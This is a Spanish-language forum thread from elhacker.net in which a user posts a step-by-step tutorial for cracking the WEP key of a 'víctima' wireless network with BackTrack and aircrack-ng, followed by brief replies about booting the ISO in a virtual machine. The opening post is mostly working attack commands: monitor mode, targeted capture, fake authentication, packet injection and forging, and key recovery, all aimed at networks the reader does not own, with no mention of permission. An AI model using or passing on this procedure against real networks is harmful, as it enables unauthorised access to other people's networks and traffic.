elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: (TUTORIAL) Aprende a emular Sentinel Dongle By Yapis


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Hacking Wireless
| | |-+  Wireless en Linux
| | | |-+  Crackear WEP con BackTrack SIMPLE y ATAQUE
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: Crackear WEP con BackTrack SIMPLE y ATAQUE  (Leído 10,719 veces)
acidc00l

Desconectado Desconectado

Mensajes: 6


Yo no he sido!


Ver Perfil WWW
Crackear WEP con BackTrack SIMPLE y ATAQUE
« en: 28 Agosto 2010, 10:57 am »

Saludos  :laugh:

Bueno, aquí pongo mi granito de arena al foro ;)

Este sera un Tutorial SIMPLE para sacar claves WEP

1.- Descargar el CD de BackTrack (van por la versión 4.0 o ahi me quede yo  :silbar: )

2.- Grabar imagen.iso a CD o meter en PENDRIVE (Recomiendo GRABAR a CD)  >:D

3.- Resetear PC y arrancar el CD de BackTrack
Para ello tendremos que configurar nuestra BIOS o sino queremos calentarnos la cabeza  ;D , podemos usar la tecla F11 (en mi pc, en alguno es F8, TAB, ESC...) para iniciar en modo MENU BOOT

4.- Si pregunta por login, usaremos root y el password es toor, eso significa que tenemos problemas con la interfaz grafica, suele ser error del archivo xorg.conf situado en /etc/X11/xorg.conf

Para arreglarlo, simplemente copiaremos el backup que hay por el xorg.conf en uso
# cp /etc/X11/xorg.conf-vesa /etc/X11/xorg.conf

Y probamos a iniciar la interfaz gráfica con startx

5.- Pasamos a configurar el Layout del teclado, pues esta en USA y 104 teclas.

Para ello pincharemos con el botón derecho del ratón en la bandera, al lado de la hora y seguidamente en configure

Cambiamos 104 teclas por 105 para ello miramos "arriba" y añadimos la bandera de nuestro país que están a la "izquierda" (en mi caso España).

6.- Abrimos 4 terminales
6.1.- En el terminal 1, averiguaremos que nombre tiene nuestra interfaz wlan.
Para ello usaremos el comando iwconfig

Mi wlan se llama wlan0 asi que a partir de ahora, esta sera la interfaz, tu tendrás que poner la tuya  ::)

7.- Ponemos nuestra interfaz wlan0 en modo monitor
# airmon-ng wlan0 start

8.- En busca de la victima...
8.1.- Nos vamos un momento al terminal 2 y averiguamos nuestra MAC
# macchanger -s wlan0

8.2.- Volvemos al terminal 1 e iniciamos la pesca
# airodump-ng --encrypt WEP wlan0

EXPLICACIÓN: --encrypt WEP (es para filtrar solo las redes con cifrado WEP)

En la lista, solo tendremos que fijarnos en 2 cosas: el PWR y la #data

Estos 2 factores, son cruciales para ahorrarnos tiempo, pues el PWR nos dice la fuerza de señal con la que nos llega la red y la #data si en este momento hay trafico, si es asi, presiona CTRL+C para parar la pesca.

8.3.- Concentrándonos en la víctima
# airodump-ng --encrypt WEP -c CANAL_VÍCTIMA -bssid MAC_VICTIMA -w hack wlan0

EXPLICACIÓN:
-c CANAL_VÍCTIMA (es el canal "channel" al lado de #data
-bssid MAC_VÍCTIMA (es la MAC de la víctima a la izquierda, es lo primero

9.- "Conectándonos a su red..."
9.1.- Nos vamos al terminal 2 y ponemos:
# aireplay-ng -1 6000 -a MAC_VICTIMA -h NUESTRA_MAC wlan0

Esperamos a la carita feliz :-)

10.- Inyectando (FORMA SIMPLE)
10.1.- Nos vamos al terminal 3 y ponemos:
# aireplay-ng -3 -b MAC_VICTIMA -h NUESTRA_MAC wlan0

Y esperamos a tener suerte y con el trafico de la víctima inyectaremos trafico para conseguir 50.000 #data (cuando tengamos 10.000 #data leemos el paso 12.1)
Si no inyecta trafico pasamos a la FORMA ATAQUE, si inyecta trafico, saltate el siguiente paso.

11.- Inyectando (FORMA ATAQUE)
11.1.-En el terminal 3 ponemos
# aireplay-ng -5 -a MAC_VÍCTIMA -h NUESTRA_MAC wlan0

Buscara paquetes y cuando nos pregunte, le ponemos "y" (sin las comillas) y nos creara un archivo.xor, este archivo.xor lo tenemos que transformar en nuestra "key"

# packetforge-ng -1 -y archivo.xor -a MAC_VÍCTIMA -c NUESTRA_MAC -h NUESTRA_MAC -l 192.168.0.1 -k 192.168.0.100 -w key

11.2.- Ahora cojemos nuestra key y atacamos
#aireplay-ng -2 -r key wlan0

Nos preguntara, le decimos "y" (sin las comillas)

12.- Cuando alcancemos la cifra de 50.000 #data...
12.1.- Nos vamos al terminal 4 y ponemos:
# aircrack-ng -s *.cap

Con suerte nos sacara la clave 100% decrypted correctly  ;-)

Y eso es todo amigos ;) un saludo y espero que les sirva mi experiencia a alguien =)

by acidc00l
« Última modificación: 11 Diciembre 2012, 16:02 pm por acidc00l » En línea

Debci
Wiki

Desconectado Desconectado

Mensajes: 2.021


Actualizate o muere!


Ver Perfil WWW
Re: Crackear WEP con BackTrack SIMPLE y ATAQUE
« Respuesta #1 en: 28 Agosto 2010, 11:33 am »

Jeje no esta mal, podrias pasarlo a PDF y haces un mini-how to sobre cracking wep.

Saludos
En línea

acidc00l

Desconectado Desconectado

Mensajes: 6


Yo no he sido!


Ver Perfil WWW
Re: Crackear WEP con BackTrack SIMPLE y ATAQUE
« Respuesta #2 en: 28 Agosto 2010, 11:41 am »

Bueno, a tanto no se si llegare jeje, solo quería transmitir mis conocimientos y que les sirva a cuantos mas mejor.

Ya se que hay mucha información, para creackear wep, pero muchas están mal, incompletas o son muy simples.

Este post, se ve simple, pero detalla paso a paso lo que se tiene que hacer.

Lo dicho, espero que les sirva como a mi me sirve siempre que tiro de ello ;)
En línea

juanic0

Desconectado Desconectado

Mensajes: 6


Ver Perfil
Re: Crackear WEP con BackTrack SIMPLE y ATAQUE
« Respuesta #3 en: 26 Octubre 2010, 09:13 am »

Buenas me a gustado tu tutorial lo voy a probar, una pregunta funcionaria  con otro live cd¿ o como lo pondria en live usb( no me apetece ir al chino a comprar un cd xD)
En línea

Saberuneko


Desconectado Desconectado

Mensajes: 2.194



Ver Perfil WWW
Re: Crackear WEP con BackTrack SIMPLE y ATAQUE
« Respuesta #4 en: 26 Octubre 2010, 10:08 am »

Puedes usar la .iso en una máquina virtual. (es lo que estaba haciendo yo ahora mismo cuando vi este post X3)
En línea

juanic0

Desconectado Desconectado

Mensajes: 6


Ver Perfil
Re: Crackear WEP con BackTrack SIMPLE y ATAQUE
« Respuesta #5 en: 26 Octubre 2010, 11:36 am »

y como lo arrancas quemandolo en una unidad virtual¿
En línea

Saberuneko


Desconectado Desconectado

Mensajes: 2.194



Ver Perfil WWW
Re: Crackear WEP con BackTrack SIMPLE y ATAQUE
« Respuesta #6 en: 26 Octubre 2010, 11:58 am »

No, hay máquinas virtuales que simplemente te permiten cargar la .iso como si hubieses metido el CD físicamente.

Así te ahorras de usar un CD.
En línea

Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Problema para crackear una wifi con backtrack 4
GNU/Linux
Rollerman 3 3,209 Último mensaje 11 Diciembre 2012, 16:06 pm
por acidc00l
ataque a wep con backtrack 4
Wireless en Linux
jammorales 1 5,046 Último mensaje 3 Junio 2010, 22:51 pm
por pazienzia
Taxonomia de Ataque con << Backtrack 4 video
Bugs y Exploits
dvdr 2 5,672 Último mensaje 10 Diciembre 2010, 18:28 pm
por dvdr
Crackear una contraseña que este en MD5 con script perl y backtrack
Ingeniería Inversa
nightcode 1 2,828 Último mensaje 1 Enero 2014, 03:44 am
por .:UND3R:.
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines